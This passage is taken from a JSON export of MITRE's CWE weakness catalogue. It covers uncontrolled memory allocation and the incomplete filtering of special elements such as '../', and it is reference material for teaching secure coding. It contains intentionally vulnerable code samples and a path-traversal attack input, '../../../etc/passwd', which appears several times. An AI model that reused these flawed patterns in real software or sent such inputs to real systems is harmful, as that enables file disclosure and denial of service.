of:",{"xhtml:div":{"xhtml:div":12345678}},"This will cause 305,419,896 bytes (over 291 megabytes) to be allocated for the string."]},{"Intro_Text":"Consider the following code, which accepts an untrusted size value and uses the size as an initial capacity for a HashMap.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"unsigned int size = GetUntrustedInt();HashMap list = new HashMap(size);","xhtml:br":""}},"Body_Text":"The HashMap constructor will verify that the initial capacity is not negative, however there is no check in place to verify that sufficient memory is present. If the attacker provides a large enough value, the application will run into an OutOfMemoryError."},{"attr":{"@_Demonstrative_Example_ID":"DX-137"},"Intro_Text":"This code performs a stack allocation based on a length calculation.","Example_Code":{"#text":"}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int a = 5, b = 6;size_t len = a - b;char buf[len];    // Just blows up the stack","xhtml:br":["",""]}},"Body_Text":["Since a and b are declared as signed ints, the \\"a - b\\" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer\'s memory space.","Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker\'s input to attain the negative value."]},{"attr":{"@_Demonstrative_Example_ID":"DX-138"},"Intro_Text":"This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function\'s action.","Example_Code":{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\');        // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s;    // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\",  jnklen);    // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"int pre_len = sizeof(\\"preamble: \\");char buf[pre_len - msg_len];","xhtml:i":["// Note space at the end of the string - assume all strings have preamble with space","... Do processing here if we get this far"],"xhtml:br":["","",""]}},"Body_Text":"The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller\'s calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations."},{"Intro_Text":"The following code obtains an untrusted number that is used as an index into an array of messages.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $num = GetUntrustedNumber();my @messages = ();$messages[$num] = \\"Hello World\\";","xhtml:br":["","",""]}},"Body_Text":["The index is not validated at all (CWE-129), so it might be possible for an attacker to modify an element in @messages that was not intended. If an index is used that is larger than the current size of the array, the Perl interpreter automatically expands the array so that the large index works.","If $num is a large value such as 2147483648 (1&lt;&lt;31), then the assignment to $messages[$num] would attempt to create a very large array, then eventually produce an error message such as:","Out of memory during array extend","This memory exhaustion will cause the Perl program to exit, possibly a denial of service. In addition, the lack of memory could also prevent many other programs from successfully running on the system."]},{"Intro_Text":"This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function\'s action. The buffer length ends up being -1 resulting in a blown out stack. The space character after the colon is included  in the function calculation, but not in the caller\'s calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations.","Example_Code":[{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\');        // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s;    // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\",  jnklen);    // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"int pre_len = sizeof(\\"preamble: \\");    // Note space at the end of the string - assume all strings have preamble with space","attr":{"@_style":"margin-left:10px;"}},{"#text":"char buf[pre_len - msg_len];","attr":{"@_style":"margin-left:10px;"}},{"#text":"... Do processing here and set status","attr":{"@_style":"margin-left:10px;"}},{"#text":"return status;","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\');        // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s;    // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\",  jnklen);    // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"int pre_len = sizeof(\\"preamble: \\");    // Note space at the end of the string - assume all strings have preamble with space","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (pre_len &lt;= msg_len) { // Log error; return error_code; }","attr":{"@_style":"margin-left:10px;"}},{"#text":"char buf[pre_len - msg_len];","attr":{"@_style":"margin-left:10px;"}},{"#text":"... Do processing here and set status","attr":{"@_style":"margin-left:10px;"}},{"#text":"return status;","attr":{"@_style":"margin-left:10px;"}}]}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-3701","Description":"program uses ::alloca() for encoding messages, but large messages trigger segfault","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3701"},{"Reference":"CVE-2008-1708","Description":"memory consumption and daemon exit by specifying a large value in a length field","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1708"},{"Reference":"CVE-2008-0977","Description":"large value in a length field leads to memory consumption and crash when no more memory is available","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0977"},{"Reference":"CVE-2006-3791","Description":"large key size in game program triggers crash when a resizing function cannot allocate enough memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3791"},{"Reference":"CVE-2004-2589","Description":"large Content-Length HTTP header value triggers application crash in instant messaging application due to failure in memory allocation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2589"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":35,"Entry_Name":"SOAP Array Abuse"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS32-PL","Entry_Name":"Validate any integer that is used as an array index","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-789"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;Resource Limits&#34;, Page 574"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-789"}}]},"Notes":{"Note":[{"#text":"This weakness can be closely associated with integer overflows (CWE-190). Integer overflow attacks would concentrate on providing an extremely large number that triggers an overflow that causes less memory to be allocated than expected. By providing a large value that does not trigger an integer overflow, the attacker could still cause excessive amounts of memory to be allocated.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Uncontrolled memory allocation is possible in many languages, such as dynamic array allocation in perl or initial size parameters in Collections in Java. However, languages like C and C++ where programmers have the power to more directly control memory management will be more susceptible."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Uncontrolled Memory Allocation","attr":{"@_Date":"2020-12-10"}}}},"790":{"attr":{"@_ID":"790","@_Name":"Improper Filtering of Special Elements","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not filter or incorrectly filters special elements before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"791":{"attr":{"@_ID":"791","@_Name":"Incomplete Filtering of Special Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not completely filter special elements before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"790","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"792":{"attr":{"@_ID":"792","@_Name":"Incomplete Filtering of One or More Instances of Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not completely filter one or more instances of special elements before sending it to a downstream component.","Extended_Description":{"xhtml:p":"Incomplete filtering of this nature involves either:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["only filtering a single instance of a special element when more exist, or","not filtering all instances or all elements where multiple special elements exist."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"791","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"793":{"attr":{"@_ID":"793","@_Name":"Only Filtering One Instance of a Special Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only filters a single instance of a special element before sending it to a downstream component.","Extended_Description":"Incomplete filtering of this nature may be location-dependent, as in only the first or last element is filtered.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"792","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"794":{"attr":{"@_ID":"794","@_Name":"Incomplete Filtering of Multiple Instances of Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not filter all instances of a special element before sending it to a downstream component.","Extended_Description":{"xhtml:p":"Incomplete filtering of this nature may be applied to:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["sequential elements (special elements that appear next to each other) or","non-sequential elements (special elements that appear multiple times in different locations)."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"792","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"795":{"attr":{"@_ID":"795","@_Name":"Only Filtering Special Elements at a Specified Location","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only accounts for special elements at a specified location, thereby missing remaining special elements that may exist before sending it to a downstream component.","Extended_Description":{"xhtml:p":["A filter might only account for instances of special elements when they occur:","This may leave special elements in the data that did not match the filter position, but still may be dangerous."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["relative to a marker (e.g. \\"at the beginning/end of string; the second argument\\"), or","at an absolute position (e.g. \\"byte number 10\\")."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"791","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-3"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter a \\"../\\" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/^\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression is only looking for an instance of \\"../\\" at the beginning of the string, it only removes the first \\"../\\" element. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-4"},"Intro_Text":"The following code takes untrusted input and uses a substring function to filter a 3-character \\"../\\" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq \'../\') {}my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""],"xhtml:div":{"#text":"$Username = substr($Username, 3);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the if function is only looking for a substring of \\"../\\" between the 0 and 2 position, it only removes that specific \\"../\\" element. So an input value such as:","will have the first \\"../\\" filtered, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"796":{"attr":{"@_ID":"796","@_Name":"Only Filtering Special Elements Relative to a Marker","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only accounts for special elements positioned relative to a marker (e.g. \\"at the beginning/end of a string; the second argument\\"), thereby missing remaining special elements that may exist before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"795","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-3"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter a \\"../\\" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/^\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression is only looking for an instance of \\"../\\" at the beginning of the string, it only removes the first \\"../\\" element. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated 